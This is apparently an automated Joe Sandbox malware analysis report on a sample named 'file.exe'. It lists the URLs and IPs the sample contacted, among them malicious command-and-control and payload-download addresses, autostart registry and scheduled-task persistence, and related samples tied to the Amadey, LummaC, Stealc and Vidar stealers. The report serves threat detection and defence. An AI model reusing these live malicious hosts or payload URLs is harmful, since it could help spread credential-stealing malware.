https://monitor.firefox.com/about	firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	false		high
https://account.bellmedia.c	firefox.exe, 00000021.00000003.2970660238.00000273AB156000.00000004.00000800.00020000.00000000.sdmp	false		high
https://login.microsoftonline.com	firefox.exe, 00000021.00000003.2970660238.00000273AB178000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2970660238.00000273AB156000.00000004.00000800.00020000.00000000.sdmp	false		high
https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryptiondocument.requestSto	firefox.exe, 00000021.00000002.3073895804.00000273A3800000.00000002.08000000.00040000.00000000.sdmp	false		high
http://185.215.113.206ones	file.exe, 00000000.00000002.2124461311.0000000000B35000.00000040.00000001.01000000.00000003.sdmp	false		high
https://www.zhihu.com/	firefox.exe, 00000021.00000002.3078069828.00000273A3BDE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	d985563cac.exe, 00000010.00000003.2714285835.0000000005C8C000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2831733537.0000000005C48000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2943217309.0000000005C3C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2970660238.00000273AB1A1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	d985563cac.exe, 00000010.00000003.2714285835.0000000005C8C000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2831733537.0000000005C48000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2943217309.0000000005C3C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2970660238.00000273AB1A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://infra.spec.whatwg.org/#ascii-whitespace	firefox.exe, 00000021.00000003.2910210529.00000273A8A1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3000439742.00000273A8A1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2964616454.00000273A8A21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3014908538.00000273A8A1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2948224150.00000273A8A21000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mozilla-hub.atlassian.net/browse/SDK-405	firefox.exe, 00000021.00000002.3078069828.00000273A3B03000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/?t=ffab&q=	firefox.exe, 00000021.00000002.3106287804.00000273A6E89000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	d985563cac.exe, 0000001E.00000003.2946390796.0000000005D29000.00000004.00000800.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/YS	d985563cac.exe, 00000010.00000003.2998838447.0000000001333000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2832377914.0000000001338000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.3000556167.0000000001333000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000002.3065632992.0000000001326000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2974806394.0000000001331000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2831958191.0000000001333000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://mail.yahoo.co.jp/compose/?To=%s	firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile.services.mozilla.com/v1/tiles	firefox.exe, 00000021.00000003.2968690731.00000273AF67D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2970660238.00000273AB1E8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	false		high
https://monitor.firefox.com/user/preferences	firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	false		high
https://screenshots.firefox.com/	firefox.exe, 00000021.00000003.2827663613.00000273A7577000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3105017765.00000273A6C70000.00000002.08000000.00040000.00000000.sdmp	false		high
https://gpuweb.github.io/gpuweb/	firefox.exe, 00000021.00000002.3052932070.00000273978D8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://firefox-source-docs.mozilla.org/remote/Security.html	firefox.exe, 00000021.00000002.3078069828.00000273A3B26000.00000004.00000800.00020000.00000000.sdmp	false		high
http://json-schema.org/draft-07/schema#-	firefox.exe, 00000021.00000002.3144749087.00000273A7803000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report	firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	false		high
http://185.215.113.16/steam/random.exe1	d985563cac.exe, 00000010.00000003.2975964335.0000000001322000.00000004.00000020.00020000.00000000.sdmp	false		high
https://vk.com/	firefox.exe, 00000021.00000002.3078069828.00000273A3BDE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingTrying	firefox.exe, 00000021.00000002.3073895804.00000273A3800000.00000002.08000000.00040000.00000000.sdmp	false		high
http://80.82.65.70/add?substr=mixtwo&s=three&sub=empy	b24ae367e7.exe, 0000000F.00000003.3043970362.00000000010D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://80.82.65.70/add?substr=mixtwo&s=three&sub=empw	b24ae367e7.exe, 0000000F.00000003.3043970362.00000000010D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://xhr.spec.whatwg.org/#sync-warningThe	firefox.exe, 00000021.00000002.3073895804.00000273A3800000.00000002.08000000.00040000.00000000.sdmp	false		high
https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4	firefox.exe, 00000021.00000002.3075223949.00000273A3A12000.00000004.00000800.00020000.00000000.sdmp	false		high
https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2	firefox.exe, 00000021.00000002.3075223949.00000273A3A12000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/google/closure-compiler/issues/3177	firefox.exe, 00000021.00000003.2904150140.00000273A8A23000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2910210529.00000273A8A1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3000439742.00000273A8A1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2964616454.00000273A8A21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3014908538.00000273A8A1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2948224150.00000273A8A21000.00000004.00000800.00020000.00000000.sdmp	false		high
https://atten-supporse.biz:443/api	d985563cac.exe, 00000012.00000002.2940566596.00000000013E5000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.3135825805.0000000001405000.00000004.00000020.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/api-21	d985563cac.exe, 00000012.00000002.2940566596.0000000001459000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://webextensions.settings.services.mozilla.com/v1	firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	false		high
https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts	firefox.exe, 00000021.00000003.3013286202.00000273A8823000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2952152055.00000273A8820000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2942953222.00000273A880F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://iplogger.org/1Pz8p7	b24ae367e7.exe, 0000000F.00000003.3114063864.00000000059B8000.00000004.00000020.00020000.00000000.sdmp, b24ae367e7.exe, 0000000F.00000003.3111629929.0000000005624000.00000004.00000020.00020000.00000000.sdmp, b24ae367e7.exe, 0000000F.00000003.3111049300.000000000595F000.00000004.00000020.00020000.00000000.sdmp, b24ae367e7.exe, 0000000F.00000003.3111193928.0000000005681000.00000004.00000020.00020000.00000000.sdmp, b24ae367e7.exe, 0000000F.00000003.3112458459.00000000059A2000.00000004.00000020.00020000.00000000.sdmp, b24ae367e7.exe, 0000000F.00000003.3112946723.0000000005A31000.00000004.00000020.00020000.00000000.sdmp, b24ae367e7.exe, 0000000F.00000003.3111829869.00000000059C0000.00000004.00000020.00020000.00000000.sdmp, b24ae367e7.exe, 0000000F.00000003.3112298391.000000000595F000.00000004.00000020.00020000.00000000.sdmp, b24ae367e7.exe, 0000000F.00000003.3113083958.000000000595F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration	firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	false		high
http://80.82.65.70/files/download)	b24ae367e7.exe, 0000000F.00000003.3111193928.00000000056B4000.00000004.00000020.00020000.00000000.sdmp, b24ae367e7.exe, 0000000F.00000003.3065452762.00000000056B4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://addons.mozilla.org/%LOCALE%/firefox/	firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	false		high
http://json-schema.org/draft-06/schema#	firefox.exe, 00000021.00000002.3144749087.00000273A7803000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
162.159.128.233	discord.com	United States	13335	CLOUDFLARENETUS	false
80.82.65.70	unknown	Netherlands	202425	INT-NETWORKSC	false
104.21.80.1	atten-supporse.biz	United States	13335	CLOUDFLARENETUS	false
34.117.188.166	contile.services.mozilla.com	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
142.250.181.68	www.google.com	United States	15169	GOOGLEUS	false
172.67.196.114	api.mylnikov.org	United States	13335	CLOUDFLARENETUS	false
31.41.244.11	unknown	Russian Federation	61974	AEROEXPRESS-ASRU	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
34.107.221.82	prod.detectportal.prod.cloudops.mozgcp.net	United States	15169	GOOGLEUS	false
205.209.109.10	unknown	United States	19318	IS-AS-1US	true
35.244.181.201	prod.balrog.prod.cloudops.mozgcp.net	United States	15169	GOOGLEUS	false
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
185.215.113.206	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
104.16.185.241	icanhazip.com	United States	13335	CLOUDFLARENETUS	false
35.190.72.216	prod.classify-client.prod.webservices.mozgcp.net	United States	15169	GOOGLEUS	false
142.250.181.78	youtube.com	United States	15169	GOOGLEUS	false
34.160.144.191	prod.content-signature-chains.prod.webservices.mozgcp.net	United States	2686	ATGS-MMD-ASUS	false

Private

IP
192.168.2.4
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1572005
Start date and time:	2024-12-10 00:41:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 20m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	56
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@106/167@63/21
EGA Information:	Successful, ratio: 75%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Max analysis timeout: 600s exceeded, the analysis took too long
Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 216.58.208.227, 142.250.181.142, 64.233.162.84, 172.217.17.46, 172.217.21.35, 172.217.21.42, 172.217.19.202, 142.250.181.138, 142.250.181.10, 142.250.181.74, 172.217.19.234, 172.217.17.74, 172.217.17.42, 142.250.181.42, 142.250.181.106, 2.20.68.210, 2.20.68.201, 192.229.221.95, 44.228.225.150, 54.200.77.17, 35.85.93.176, 23.37.184.244, 23.195.61.229, 2.19.198.56, 23.32.238.130, 199.232.214.172, 20.42.73.29, 88.221.134.155, 172.217.17.35, 172.217.19.206, 199.232.210.172, 23.206.103.35, 52.149.20.212, 13.107.246.63, 20.231.128.66, 52.178.17.235
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, aus5.mozilla.org, learn.microsoft.com, a767.dspw65.akamai.net, a19.dscg10.akamai.net, e11290.dspg.akamaiedge.net, clients2.google.com, ocsp.digicert.com, us-west1.prod.sumo.prod.webservices.mozgcp.net, login.live.com, star-azurefd-prod.trafficmanager.net, firefox.settings.services.mozilla.com, learn.microsoft.com.edgekey.net, onedsblobprdeus15.eastus.cloudapp.azure.com, update.googleapis.com, www.youtube.com, www.gstatic.com, normandy-cdn.services.mozilla.com, wu-b-net.trafficmanager.net, star-mini.c10r.facebook.com, fs.microsoft.com, shavar.prod.mozaws.net, ogads-pa.googleapis.com, learn.microsoft.com.edgekey.net.globalredir.akadns.net, dyna.wikimedia.org, normandy.cdn.mozilla.net, youtube-ui.l.google.com, reddit.map.fastly.net, edgedl.me.gvt1.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, clients.l.google.com, location.services.mozilla.com, www.reddit.com, services
Execution Graph export aborted for target file.exe, PID 7288 because there are no executed function
HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
18:42:29	API Interceptor	68x Sleep call for process: file.exe modified
18:43:01	API Interceptor	12214529x Sleep call for process: skotes.exe modified
18:43:34	API Interceptor	185x Sleep call for process: d985563cac.exe modified
18:43:44	API Interceptor	11322564x Sleep call for process: n4e23hz.exe modified
18:43:52	API Interceptor	2580x Sleep call for process: b24ae367e7.exe modified
18:44:53	API Interceptor	72x Sleep call for process: c20459f2e6.exe modified
18:44:56	API Interceptor	1x Sleep call for process: WerFault.exe modified
23:42:43	Task Scheduler	Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
23:43:34	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run d985563cac.exe C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe
23:43:42	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run d985563cac.exe C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe
23:43:50	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 25045de666.exe C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe
23:43:59	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run f1628a2a52.exe C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe
23:44:07	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 1124f3753f.exe C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe
23:44:21	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 25045de666.exe C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe
23:44:30	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run f1628a2a52.exe C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe
23:44:39	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 1124f3753f.exe C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.43	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	SJqOoILabX.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	8GHb2yuPOk.exe	Get hash	malicious	Amadey, LummaC Stealer	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, Vidar, XWorm	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.43/Zu7JuNko/index.php
162.159.128.233	file.exe	Get hash	malicious	LummaC, Glupteba, PureLog Stealer, RisePro Stealer, SmokeLoader, Stealc, zgRAT	Browse	discord.com/phpMyAdmin/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
example.org	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	93.184.215.14
discord.com	file.exe	Get hash	malicious	Blank Grabber	Browse	162.159.136.232
	xooSsYaHN0.exe	Get hash	malicious	Go Stealer, Skuld Stealer	Browse	162.159.128.233
	IErMYVWrv9.exe	Get hash	malicious	Python Stealer, Luna Grabber, Luna Logger	Browse	162.159.135.232
	Cooperative Agreement0000800380.docx.exe	Get hash	malicious	Babadeda, Blank Grabber	Browse	162.159.138.232
	https___files.catbox.moe_l2rczc.pif.exe	Get hash	malicious	Unknown	Browse	162.159.135.232
	VzhY4BcvBH.exe	Get hash	malicious	AsyncRAT, RedLine, StormKitty, VenomRAT	Browse	162.159.136.232
	5QnwxSJVyX.doc	Get hash	malicious	Unknown	Browse	162.159.136.232
	speedymaqing.exe	Get hash	malicious	Python Stealer, Discord Token Stealer	Browse	162.159.138.232
	main.exe	Get hash	malicious	Blank Grabber, SilentXMRMiner, Xmrig	Browse	162.159.135.232
	EsgeCzT4do.exe	Get hash	malicious	XWorm	Browse	162.159.137.232
plus.l.google.com	GLAMPITECT++LTD+(PROPOSAL).eml	Get hash	malicious	unknown	Browse	172.217.17.78
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	172.217.17.78
	https://shorturl.at/aRqLH/	Get hash	malicious	Unknown	Browse	172.217.17.78
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.217.17.78
	https://uhu145fc.s3.amazonaws.com/bf63.html?B3E2629E-DF5B-2F28-7322FD910FB23F54	Get hash	malicious	Phisher	Browse	142.250.181.110
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, Vidar, XWorm	Browse	172.217.17.46
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar	Browse	172.217.17.46
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	172.217.17.78
	https://sites.google.com/view/messageimportant09122024/accueil	Get hash	malicious	Unknown	Browse	74.125.21.100
	https://sites.google.com/view/messageimportant09122024/accueil	Get hash	malicious	Unknown	Browse	172.217.17.78

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1
	https://www.google.com.hk/url?q=KWUZMS42J831JSWOSF4KEIP36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XS%25RANDOM4%25wDnNeW8yycT&sa=t&esrc=nNeW8F%25RANDOM3%25A0xys8Em2FL&source=&cd=tS6T8%25RANDOM3%25Tiw9XH&cad=XpPkDfJX%25RANDOM4%25VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fjvsimmigration.com/c/efcfa9e5f8b2f41713ea899643a31954/YnJ1Y2VwQGxlc21hbi5jb20=	Get hash	malicious	Unknown	Browse	104.17.25.14
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.112.1
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.48.1
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	1.1.1.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	https://bcnys.us11.list-manage.com/track/click?u=b3ce03a042f3f32fe41fe1faf&id=8c15544f56&e=24911589a5	Get hash	malicious	Unknown	Browse	1.1.1.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	172.67.139.78
	GLAMPITECT++LTD+(PROPOSAL).eml	Get hash	malicious	unknown	Browse	104.16.144.15
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
INT-NETWORKSC	file.exe	Get hash	malicious	Unknown	Browse	80.82.65.70
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	80.82.65.70
	file.exe	Get hash	malicious	Unknown	Browse	80.82.65.70
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	80.82.65.70
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	80.82.65.70
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc	Browse	80.82.65.70
	file.exe	Get hash	malicious	Unknown	Browse	80.82.65.70
	SJqOoILabX.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	80.82.65.70
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	80.82.65.70
	file.exe	Get hash	malicious	Unknown	Browse	80.82.65.70
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1
	https://www.google.com.hk/url?q=KWUZMS42J831JSWOSF4KEIP36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XS%25RANDOM4%25wDnNeW8yycT&sa=t&esrc=nNeW8F%25RANDOM3%25A0xys8Em2FL&source=&cd=tS6T8%25RANDOM3%25Tiw9XH&cad=XpPkDfJX%25RANDOM4%25VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fjvsimmigration.com/c/efcfa9e5f8b2f41713ea899643a31954/YnJ1Y2VwQGxlc21hbi5jb20=	Get hash	malicious	Unknown	Browse	104.17.25.14
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.112.1
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.48.1
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	1.1.1.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	https://bcnys.us11.list-manage.com/track/click?u=b3ce03a042f3f32fe41fe1faf&id=8c15544f56&e=24911589a5	Get hash	malicious	Unknown	Browse	1.1.1.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	172.67.139.78
	GLAMPITECT++LTD+(PROPOSAL).eml	Get hash	malicious	unknown	Browse	104.16.144.15

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	SigWeb.exe	Get hash	malicious	Unknown	Browse	172.67.196.114 162.159.128.233
	List of required items and services pdf.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	172.67.196.114 162.159.128.233
	http://xn--gmq700hb9ir4byxw.shop/bnBkL2ViZml0c2JwY0F7Zm1mdy9idWp0cHMkbHYvcGQvem1xanVtYnNmZC9xbmJ3MDA7dHF1dWk	Get hash	malicious	ReCaptcha Phish	Browse	172.67.196.114 162.159.128.233
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.67.196.114 162.159.128.233
	node-v22.12.0-x64.msi	Get hash	malicious	Unknown	Browse	172.67.196.114 162.159.128.233
	SJqOoILabX.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	172.67.196.114 162.159.128.233
	Marsha Rowland Signature Required.pdf	Get hash	malicious	Unknown	Browse	172.67.196.114 162.159.128.233
	Rfq_po_december_purchase_list_details_specifications_09_12_2024_0000000000.vbs	Get hash	malicious	Unknown	Browse	172.67.196.114 162.159.128.233
	lLNOwu1HG4.js	Get hash	malicious	RHADAMANTHYS	Browse	172.67.196.114 162.159.128.233
	run.cmd	Get hash	malicious	Unknown	Browse	172.67.196.114 162.159.128.233
